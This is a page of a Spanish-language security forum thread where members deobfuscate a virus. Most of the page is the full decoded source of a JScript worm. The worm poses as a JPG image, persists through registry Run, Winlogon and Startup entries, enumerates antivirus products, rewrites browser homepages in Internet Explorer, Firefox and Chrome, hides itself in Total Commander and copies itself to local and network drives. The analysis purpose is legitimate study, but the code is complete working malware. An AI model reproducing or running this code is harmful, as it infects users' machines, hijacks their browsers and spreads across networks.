elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  [Ayuda] descifrando un virus
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] Ir Abajo Respuesta Imprimir
Autor Tema: [Ayuda] descifrando un virus  (Leído 18,495 veces)
Wolfkey

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: [Ayuda] descifrando un virus
« Respuesta #20 en: 8 Octubre 2015, 09:37 am »

no sabia que el vbs se parecía tanto el js... solo tienes que seguir los pasos sin el eval (para que no se ejecute) y revisar la variable que se evalua

aquí está sin la primera ofuscación

Código
  1. try {
  2.    a = WScript.CreateObject('Scri' + 'pting.Fi' + 'leSys' + 'temObj' + 'ect');
  3.    b = WScript.CreateObject('WSc' + 'ript.Sh' + 'ell');
  4.    s = WScript.CreateObject('She' + 'll.Appli' + 'cation');
  5.    wl = WScript.CreateObject('WbemScr' + 'ipting.SWbemL' + 'ocator');
  6.    db = WScript.CreateObject('ADO' + 'DB.Str' + 'eam');
  7.    db.CharSet = "US-ASCII";
  8.    db.Type = 2;
  9.    c3 = b.SpecialFolders("Startup");
  10.    nt6 = (b.RegRead('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentVersion') >= 6 ? true : false);
  11.    jico = b.RegRead("HKLM\\SOFTWARE\\Classes\\" + b.RegRead("HKLM\\SOFTWARE\\Classes\\.jpg\\") + "\\DefaultIcon\\");
  12.    ico = "explorer.exe";
  13.    g = WScript.ScriptFullName;
  14.    da = new Date();
  15.    ano = da.getYear() + "";
  16.    mes = da.getMonth();
  17.    dia = da.getDate();
  18.    hra = 0;
  19.    antv = new Array("");
  20.    rgk = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";
  21.    wlg = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell";
  22.    gn = new Array("IMG", "IMG_", "PIC", "DSC", "CIMG", "HPIM", "IMAG", "DSCF", "DSCN", "DCIM", "IM", "PICT", "SAM_");
  23.    sp = "";
  24.    for (r = 0; r < 94; r++) {
  25.        sp += " ";
  26.    }
  27.    ex = gn[Math.round(Math.random() * 12)] + ano.substring(2, 4) + "" + mes + dia + ".JPG" + sp + ".jse";
  28.    jex = "";
  29.    tas = "explorer";
  30.    fsz = a.GetFile(g).Size;
  31.    wsc = WScript.FullName;
  32.    stl = "https://www.google.es/#output=search&sclient=psy-ab&q=fiverdolly+";
  33.    stp = stl + fsz;
  34.    if (s.NameSpace(26) == "Roaming") {
  35.        tot = a.GetFolder(s.NameSpace(26).ParseName("Microsoft").Path).ParentFolder;
  36.    } else {
  37.        tot = s.NameSpace(40).ParseName(s.NameSpace(26)).Path;
  38.    }
  39.    nt();
  40. } catch (e) {}
  41. sf = "";
  42.  
  43. function nt() {
  44.    try {
  45.        c1 = s.NameSpace(28).ParseName("microsoft");
  46.        c2 = c1.GetFolder.Items().Count;
  47.        rf = Math.round(Math.random() * c2 - 1);
  48.        c4 = c1.GetFolder.Items().item(rf).Path;
  49.        if (a.FolderExists(c4) == false) {
  50.            c4 = a.GetFile(c4).ParentFolder;
  51.        }
  52.    } catch (e) {
  53.        c4 = c1.Path;
  54.    }
  55.    c5 = Math.random() * 8 + 1 + "";
  56.    c5 = c5.replace(".", "");
  57.    try {
  58.        b.RegWrite("HKCU\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\", jico, "REG_SZ");
  59.    } catch (e) {}
  60.    try {
  61.        jtyp = b.RegRead("HKLM\\SOFTWARE\\Classes\\jpegfile\\FriendlyTypeName");
  62.        b.RegWrite("HKCU\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName", jtyp, "REG_EXPAND_SZ");
  63.    } catch (e) {}
  64.    try {
  65.        b.RegWrite("HKLM\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\", jico, "REG_SZ");
  66.    } catch (e) {}
  67.    try {
  68.        b.RegWrite("HKLM\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName", jtyp, "REG_EXPAND_SZ");
  69.    } catch (e) {}
  70.    if (g.substring(g.lastIndexOf("\\") + 1, g.length).toLowerCase().search(".jpg" + sp + ".jse") != -1) {
  71.        try {
  72.            if (a.FileExists(g.substring(0, g.lastIndexOf(sp + ".jse"))) == true) {
  73.                b.run('"' + g.substring(0, g.lastIndexOf(sp + ".jse")) + '"');
  74.            } else {
  75.                wp = b.RegRead("HKCU\\Control Panel\\Desktop\\Wallpaper");
  76.                if (wp.substring(wp.lastIndexOf("\\") + 1, wp.length) == "TranscodedWallpaper") {
  77.                    jpgc = b.RegRead("HKLM\\SOFTWARE\\Classes\\jpegfile\\shell\\open\\command\\").replace("%1", wp);
  78.                    b.run(jpgc);
  79.                } else {
  80.                    b.run('"' + wp + '"');
  81.                }
  82.            }
  83.        } catch (e) {}
  84.        try {
  85.            sc = wl.ConnectServer(null, "root\\default");
  86.            rg = sc.Get("StdRegProv");
  87.            m = rg.Methods_.Item("EnumValues");
  88.            pin = m.InParameters.SpawnInstance_();
  89.            rk = new Object();
  90.            rk["HKCU"] = rk["HKEY_CURRENT_USER"] = 0x80000001;
  91.            rv = rk[rgk.substr(0, rgk.indexOf("\\"))];
  92.            pin.hDefKey = rv;
  93.            pin.sSubKeyName = rgk.substr(rgk.indexOf("\\") + 1);
  94.            pot = rg.ExecMethod_(m.Name, pin);
  95.            ak = pot.sNames.toArray();
  96.            for (key in ak) {
  97.                tts = b.RegRead(rgk + "\\" + ak[key]) + "";
  98.                if (tts.search(".exe") != -1) {
  99.                    tts2 = tts.substring(0, tts.search(".exe"));
  100.                    tts3 = tts2.substring(tts2.lastIndexOf(":") - 1, tts2.length) + ".exe";
  101.                    if (a.FileExists(tts3) == true) {
  102.                        ico = tts3;
  103.                    }
  104.                    if (tts2.indexOf("\\") != -1) {
  105.                        tts2 = tts2.substring(tts2.lastIndexOf("\\") + 1, tts2.length);
  106.                    }
  107.                    tas = tts2;
  108.                }
  109.            }
  110.        } catch (e) {}
  111.        if (tas.indexOf(" ") != -1) {
  112.            tas = tas.substring(0, tas.indexOf(" "));
  113.        }
  114.        if (tas.indexOf(".") != -1) {
  115.            tas = tas.substring(0, tas.indexOf("."));
  116.        }
  117.        try {
  118.            newd = fsz;
  119.            olddf = b.RegRead(wlg);
  120.            olddf = olddf.substring(olddf.lastIndexOf('" "') + 3, olddf.lastIndexOf('"'));
  121.        } catch (e) {
  122.            olddf = shcu();
  123.        }
  124.        if (a.FileExists(olddf) == true) {
  125.            c4 = a.GetFile(olddf).ParentFolder;
  126.            oldd = a.GetFile(olddf).size;
  127.        } else {
  128.            oldd = 0;
  129.            olddf = c4 + "\\" + c5;
  130.        }
  131.        if (newd >= oldd) {
  132.            if (a.FileExists(olddf) == true) {
  133.                a.GetFile(olddf).Attributes = 0;
  134.            }
  135.            db.Open();
  136.            try {
  137.                av = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter" + (nt6 ? '2' : ''));
  138.                avi = av.ExecQuery("SELECT * FROM AntiVirusProduct", "WQL");
  139.                navi = new Enumerator(avi);
  140.                antv = new Array();
  141.                for (; !navi.atEnd(); navi.moveNext()) {
  142.                    oav = navi.item();
  143.                    antv.push(oav.displayName);
  144.                }
  145.            } catch (e) {
  146.                antv = new Array("NAC");
  147.            }
  148.            try {
  149.                vic = "<" + b.RegRead("HKCU\\Volatile Environment\\LOGONSERVER").replace("\\\\", "") + ":" + b.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName") + "=" + s.NameSpace(40) + ":" + antv + ">";
  150.            } catch (e) {
  151.                vic = "";
  152.            }
  153.            cod = ci();
  154.            if (cod.search(vic) == -1 && rad != 0) {
  155.                nda = vic + "**/";
  156.                his = cod.replace("**/", nda);
  157.                db.WriteText(his);
  158.            } else {
  159.                db.WriteText(cod);
  160.            }
  161.            db.SaveToFile(olddf, 2);
  162.            db.Close();
  163.            try {
  164.                if (a.GetFile(olddf).OpenAsTextStream(1, -2).ReadAll().charCodeAt(0) != 122) {
  165.                    a.CopyFile(g, olddf, true);
  166.                }
  167.                a.GetFile(olddf).Attributes = 2;
  168.            } catch (e) {}
  169.            wsh = c4 + "\\" + tas + ".exe";
  170.            try {
  171.                a.CopyFile(wsc, wsh);
  172.            } catch (e) {}
  173.            a.GetFile(wsh).Attributes = 2;
  174.            try {
  175.                drg = '"' + wsh + '" "' + olddf + '" //E:JScript //B';
  176.                shcu();
  177.                ec = b.CreateShortcut(c3 + "\\" + tas + ".lnk");
  178.                ec.TargetPath = c4 + "\\" + tas + ".exe";
  179.                ec.Arguments = '"' + olddf + '" //E:JScript //B -ns';
  180.                ec.IconLocation = ico;
  181.                ec.Save();
  182.                b.RegWrite(wlg, drg, 'REG_SZ');
  183.                WScript.Sleep(9999);
  184.                if (b.RegRead(wlg) == drg) {
  185.                    a.DeleteFile(c3 + "\\" + tas + ".lnk");
  186.                }
  187.            } catch (e) {}
  188.        }
  189.    } else {
  190.        try {
  191.            if (WScript.Arguments.length == 0) {
  192.                b.run("explorer.exe");
  193.            }
  194.        } catch (e) {}
  195.        try {
  196.            fcfp = new Array();
  197.            tcmd = new Array();
  198.            for (t = 0; t < 9; t++) {
  199.                tcmd.push(tot + "\\TC201" + t + "\\tcignore.txt");
  200.                try {
  201.                    fcfp.push(s.NameSpace(38).ParseName("TotalCommander201" + t).Path + "\\Tools\\Mozilla Firefox\\defaults\\profile");
  202.                } catch (e) {}
  203.                try {
  204.                    fcfp.push(s.NameSpace(48).ParseName("TotalCommander201" + t).Path + "\\Tools\\Mozilla Firefox\\defaults\\profile");
  205.                } catch (e) {}
  206.            }
  207.            try {
  208.                tcmd.push(s.NameSpace(38).ParseName("TC UP").Path + "\\tcignore.txt");
  209.            } catch (e) {}
  210.            try {
  211.                tcmd.push(s.NameSpace(48).ParseName("TC UP").Path + "\\tcignore.txt");
  212.            } catch (e) {}
  213.            try {
  214.                tcmd.push(s.NameSpace(28).ParseName("ghisler").Path + "\\tcignore.txt");
  215.            } catch (e) {}
  216.            try {
  217.                tcmd.push(s.NameSpace(26).ParseName("ghisler").Path + "\\tcignore.txt");
  218.            } catch (e) {}
  219.            tcmd.push("c:\\totalcmd\\tcignore.txt");
  220.            for (t = 0; t < tcmd.length; t++) {
  221.                if (a.FileExists(tcmd[t].replace("tcignore.txt", "wincmd.ini")) == true) {
  222.                    try {
  223.                        db.Open();
  224.                        if (a.FileExists(tcmd[t]) == false) {
  225.                            ttn = a.CreateTextFile(tcmd[t], true);
  226.                            ttn.Write("**.**.jse");
  227.                            ttn.close();
  228.                        }
  229.                        igl = "";
  230.                        try {
  231.                            db.LoadFromFile(tcmd[t]);
  232.                            igl = db.ReadText;
  233.                        } catch (e) {}
  234.                        db.Close();
  235.                        if (igl.indexOf("**.**.jse") == -1) {
  236.                            db.Open();
  237.                            db.WriteText(igl, 1);
  238.                            db.WriteText("**.**.jse", 1);
  239.                            a.DeleteFile(tcmd[t]);
  240.                            db.SaveToFile(tcmd[t]);
  241.                            db.Close();
  242.                        }
  243.                    } catch (e) {}
  244.                    try {
  245.                        tor = a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder + "\\Wincmd.ini", 1, true, 0);
  246.                        toa = tor.ReadAll();
  247.                        if (toa.search("IgnoreListFileEnabled=0") != -1) {
  248.                            toa = toa.replace("IgnoreListFileEnabled=0", "IgnoreListFileEnabled=1");
  249.                        }
  250.                        if (toa.search("IgnoreListFile=") == -1) {
  251.                            toa = toa.replace("[Configuration]", "[Configuration]" + "\nIgnoreListFile=" + tcmd[t]);
  252.                        }
  253.                        if (tcmd[t].search("TC201") != -1) {
  254.                            if (toa.search("=*.jse") == -1) {
  255.                                filt = toa.substring(toa.lastIndexOf("Filter") + 6, toa.lastIndexOf(".icon="));
  256.                                enf = toa.substring(toa.lastIndexOf("Filter"), toa.length);
  257.                                enl = enf.substring(0, enf.indexOf("\n") + 1);
  258.                                fln = new Number(filt) + 1;
  259.                                ficon = toa.substring(toa.search("Filter11.icon=") + 14, toa.length);
  260.                                dicon = ficon.substring(0, ficon.search("\n"));
  261.                                toa = toa.replace(enl, enl + "\nFilter" + fln + "=*.jse\nFilter" + fln + ".icon=" + dicon + "\n");
  262.                                toa = toa.replace("FileTipWindows=1", "FileTipWindows=0");
  263.                            }
  264.                        }
  265.                        tor.close();
  266.                        tow = a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder + "\\Wincmd.ini", 2, true, 0);
  267.                        tow.Write(toa);
  268.                        tow.close();
  269.                    } catch (e) {}
  270.                }
  271.            }
  272.        } catch (e) {}
  273.        try {
  274.            b.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", stp, "REG_SZ")
  275.        } catch (e) {}
  276.        try {
  277.            if (a.FolderExists(tot + "\\Mozilla\\Firefox\\Profiles") == true) {
  278.                fpf = a.GetFolder(tot + "\\Mozilla\\Firefox\\Profiles");
  279.                pff = new Enumerator(fpf.SubFolders);
  280.                for (; !pff.atEnd(); pff.moveNext()) {
  281.                    pfs = pff.item() + "";
  282.                    if (pfs.search(".default") != -1) {
  283.                        fcfp.push(pfs);
  284.                    }
  285.                }
  286.            }
  287.            for (q = 0; q < fcfp.length; q++) {
  288.                try {
  289.                    if (a.FileExists(fcfp[q] + "\\prefs.js") == true); {
  290.                        fjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 1);
  291.                        fjs = fjf.ReadAll();
  292.                        fjf.close();
  293.                        usp = 'user_pref("browser.startup.homepage",';
  294.                        if (fjs.indexOf(usp) != -1) {
  295.                            fjs1 = fjs.substring(fjs.indexOf(usp) + 37, fjs.length);
  296.                            fjs2 = fjs1.substring(0, fjs1.indexOf(');') + 2);
  297.                            fjs3 = fjs.replace(usp + fjs2, usp + ' "' + stp + '");');
  298.                            wjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 2);
  299.                            wjf.Write(fjs3);
  300.                        } else {
  301.                            wjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 8);
  302.                            wjf.WriteLine('\n' + usp + ' "' + stp + '");');
  303.                        }
  304.                        wjf.close();
  305.                    }
  306.                } catch (e) {}
  307.            }
  308.        } catch (e) {}
  309.        try {
  310.            gfs = s.NameSpace(28).ParseName("Google").Path + "\\Chrome\\User Data\\Default\\Preferences";
  311.            if (a.FileExists(gfs) == true) {
  312.                gjf = a.OpenTextFile(gfs, 1);
  313.                gjs = gjf.ReadAll();
  314.                gjf.close();
  315.                gjsn = gjs.length;
  316.                urs = '"urls_to_restore_on_startup": [';
  317.                ros = '"restore_on_startup":';
  318.                rosm = '"restore_on_startup_migrated":';
  319.                if (gjs.indexOf(stl) == -1) {
  320.                    if (gjs.indexOf(urs) != -1) {
  321.                        gjs1 = gjs.substring(gjs.indexOf(urs) + 31, gjsn);
  322.                        gjs2 = gjs1.substring(0, gjs1.indexOf("]") + 1);
  323.                        gjs3 = gjs.replace(urs + gjs2, urs + ' "' + stp + '", ' + gjs2);
  324.                    } else {
  325.                        gjs1 = gjs.substring(gjs.indexOf(rosm), gjsn);
  326.                        gjs2 = gjs1.substring(0, gjs1.indexOf("\n") + 1);
  327.                        gjs3 = gjs.replace(gjs2, rosm + ' true,\n\t' + urs + ' "' + stp + '" ]\n');
  328.                    }
  329.                    gjs4 = gjs.substring(gjs.indexOf(ros), gjsn);
  330.                    gjs5 = gjs4.substring(0, gjs4.indexOf(',') + 1);
  331.                    gjs3 = gjs3.replace(gjs5, ros + ' 4,');
  332.                    wjg = a.OpenTextFile(gfs, 2);
  333.                    wjg.Write(gjs3);
  334.                    wjg.close();
  335.                } else {
  336.                    fds = gjs.substring(gjs.indexOf(stl), gjs.length);
  337.                    fdc = fds.substring(0, fds.indexOf('"'));
  338.                    gjs4 = gjs.replace(fdc, stp);
  339.                    wjg = a.OpenTextFile(gfs, 2);
  340.                    wjg.Write(gjs4);
  341.                    wjg.close();
  342.                }
  343.            }
  344.        } catch (e) {}
  345.        mk();
  346.    }
  347. }
  348.  
  349. function mk() {
  350.    WScript.Sleep(120000);
  351.    try {
  352.        c = new Enumerator(a.Drives);
  353.        for (; !c.atEnd(); c.moveNext()) {
  354.            tipodisco = c.item().DriveType;
  355.            switch (tipodisco) {
  356.                case 1:
  357.                case 3:
  358.                    if (c.item() != "A:" && c.item() != "B:") {
  359.                        try {
  360.                            sf = a.GetFolder(pe(c.item() + "\\"));
  361.                            tgf = new Enumerator(sf.files);
  362.                            for (; !tgf.atEnd(); tgf.moveNext()) {
  363.                                stf = tgf.item() + "";
  364.                                if (stf.substring(stf.length - 4, stf.length).toUpperCase() == ".JPG") {
  365.                                    jex = tgf.item().Name + sp + ".jse";
  366.                                }
  367.                                if (stf.toLowerCase().indexOf(".jpg" + sp + ".jse") != -1) {
  368.                                    ex = tgf.item().Name;
  369.                                }
  370.                            }
  371.                            if (a.FileExists(sf + "\\" + ex) == false) {
  372.                                if (jex != "") {
  373.                                    ex = jex;
  374.                                }
  375.                                a.CopyFile(g, sf + "\\" + ex);
  376.                                if (a.FileExists(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) {
  377.                                    a.GetFile(sf + "\\" + ex).Attributes = a.GetFile(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes;
  378.                                } else {
  379.                                    a.GetFile(sf + "\\" + ex).Attributes = 0
  380.                                };
  381.                                if (a.FileExists(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) {
  382.                                    a.GetFile(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes = 2;
  383.                                }
  384.                            } else {
  385.                                if (a.GetFile(sf + "\\" + ex).Size < fsz) {
  386.                                    a.GetFile(sf + "\\" + ex).Attributes = 0;
  387.                                    a.DeleteFile(sf + "\\" + ex);
  388.                                    a.CopyFile(g, sf + "\\" + ex);
  389.                                    a.GetFile(sf + "\\" + ex).Attributes = 0;
  390.                                }
  391.                            }
  392.                        } catch (e) {}
  393.                        sf = "";
  394.                    }
  395.                    break;
  396.                default:
  397.                    break;
  398.            }
  399.        }
  400.    } catch (e) {}
  401.    try {
  402.        if (hra < 12) {
  403.            hra += 1;
  404.        }
  405.        if (hra == 12) {
  406.            dns = s.NameSpace(18);
  407.            ens = dns.Items().Count;
  408.            hns = new Array();
  409.            for (f = 0; f < ens; f++) {
  410.                gns = dns.Items().item(f);
  411.                hns.push("dns.Items().Item(" + f + ").GetFolder");
  412.            }
  413.            for (i = 0; i < hns.length; i++) {
  414.                try {
  415.                    jns = eval(hns[i]).Items().Count;
  416.                    for (l = 0; l < jns; l++) {
  417.                        if (a.FolderExists(eval(hns[i] + ".Items().item(" + l + ").Path")) == false) {
  418.                            hns.push(hns[i] + ".Items().item(" + l + ").GetFolder");
  419.                        } else {
  420.                            try {
  421.                                dis = pe(eval(hns[i] + ".Items().item(" + l + ").Path") + "\\") + "";
  422.                                di = a.GetFolder(dis);
  423.                                tgf = new Enumerator(di.files);
  424.                                for (; !tgf.atEnd(); tgf.moveNext()) {
  425.                                    stf = tgf.item() + "";
  426.                                    if (stf.substring(stf.length - 4, stf.length).toUpperCase() == ".JPG") {
  427.                                        jex = tgf.item().Name + sp + ".jse";
  428.                                    }
  429.                                    if (stf.toLowerCase().indexOf(".jpg" + sp + ".jse") != -1) {
  430.                                        ex = tgf.item().Name;
  431.                                    }
  432.                                }
  433.                                if (a.FileExists(di + "\\" + ex) == false && dis.charAt(1) != ":") {
  434.                                    if (jex != "") {
  435.                                        ex = jex;
  436.                                    }
  437.                                    a.CopyFile(g, di + "\\" + ex);
  438.                                    if (a.FileExists(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) {
  439.                                        a.GetFile(di + "\\" + ex).Attributes = a.GetFile(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes;
  440.                                    } else {
  441.                                        a.GetFile(di + "\\" + ex).Attributes = 0;
  442.                                    }
  443.                                    if (a.FileExists(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) {
  444.                                        a.GetFile(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes = 2;
  445.                                    }
  446.                                } else {
  447.                                    if (a.GetFile(di + "\\" + ex).Size < fsz) {
  448.                                        a.GetFile(di + "\\" + ex).Attributes = 0;
  449.                                        a.DeleteFile(di + "\\" + ex);
  450.                                        a.CopyFile(g, di + "\\" + ex);
  451.                                        a.GetFile(di + "\\" + ex).Attributes = 0;
  452.                                    }
  453.                                }
  454.                            } catch (e) {}
  455.                        }
  456.                    }
  457.                } catch (e) {}
  458.            }
  459.            hra = 0;
  460.        }
  461.    } catch (e) {}
  462.    mk();
  463. }
  464.  
  465. function ci() {
  466.    try {
  467.        db2 = a.OpenTextFile(g, 1);
  468.        g2 = db2.ReadAll();
  469.        db2.Close();
  470.        g3 = g2.substring(g2.search('z="') + 3, g2.search('";'));
  471.        g1 = g2.substring(0, g2.search('z="') + 3);
  472.        gr = g2.substring(g2.search('";'), g2.length);
  473.        t = ll;
  474.        tt = "";
  475.        tm = t.length;
  476.        rac = Math.round(Math.random() * 98) + 1;
  477.        for (x = 0; x < tm; x++) {
  478.            num = t.charCodeAt(x) + rac;
  479.            hx = num.toString(16);
  480.            if (hx.length < 2) {
  481.                hx = "0" + hx;
  482.            }
  483.            tt += hx;
  484.            hx = '';
  485.        }
  486.        if (rac < 10) {
  487.            rac = "0" + rac;
  488.        }
  489.        tt += rac;
  490.        g4 = g1 + tt + gr;
  491.        return g4;
  492.    } catch (e) {}
  493. }
  494.  
  495. function pe(tar) {
  496.    onef = false;
  497.    sfp = a.GetFolder(tar);
  498.    tgc = new Enumerator(sfp.subFolders);
  499.    for (; !tgc.atEnd(); tgc.moveNext()) {
  500.        stc = tgc.item().Name.toLowerCase();
  501.        if (stc.search("foto") != -1 || stc.search("photo") != -1 || stc.search("image") != -1 || stc.search("im\u00E1ge") != -1 || stc.search("picture") != -1) {
  502.            if (onef == false) {
  503.                sfp = a.GetFolder(tgc.item() + "\\");
  504.            }
  505.            onef = true;
  506.        }
  507.    }
  508.    return sfp;
  509. }
  510.  
  511. function shcu() {
  512.    cshc = "";
  513.    lnks = new Enumerator(a.GetFolder(c3).files);
  514.    for (; !lnks.atEnd(); lnks.moveNext()) {
  515.        try {
  516.            lks = lnks.item() + "";
  517.            if (lks.substring(lks.length - 4, lks.length).toLowerCase() == ".lnk") {
  518.                lnka = b.CreateShortcut(lnks.item()).Arguments;
  519.                if (lnka.search("//E:JScript //B -ns") != -1) {
  520.                    cshc = lnka.substring(lnka.indexOf('"') + 1, lnka.lastIndexOf('"'));
  521.                    a.DeleteFile(lnks.item());
  522.                }
  523.            }
  524.        } catch (e) {}
  525.    }
  526.    return cshc;
  527. }

Hola, una pregunta, usaste algun programa para traducir, de ser asi cual seria, sino, como lo hiciste para traducir toda esa cadena y en que lenguaje esta ese codigo(no el traducido el original)
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [Ayuda] descifrando un virus
« Respuesta #21 en: 8 Octubre 2015, 10:09 am »

No se utilizó ningún programa. Lo tienes todo explicado entre la pagina 2 y 3
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
Páginas: 1 2 [3] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Cifrando y Descifrando C#
.NET (C#, VB.NET, ASP)
junxcosio 6 16,215 Último mensaje 15 Enero 2010, 10:41 am
por junxcosio
Descifrando un algoritmo
PHP
Feedeex 4 4,187 Último mensaje 29 Diciembre 2010, 17:20 pm
por WHK
Ayuda! Descifrando clave wep Con Acceso limitado 200mil ivs...
Wireless en Linux
Gospi 1 3,266 Último mensaje 7 Octubre 2012, 08:04 am
por Sh4k4
Chip TPM y descifrando patron
Criptografía
pindonga123 3 32,005 Último mensaje 22 Octubre 2014, 20:53 pm
por pindonga123
Descifrando Malwared
Análisis y Diseño de Malware
s3tH 1 3,412 Último mensaje 11 Noviembre 2015, 21:29 pm
por _TTFH_3500
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines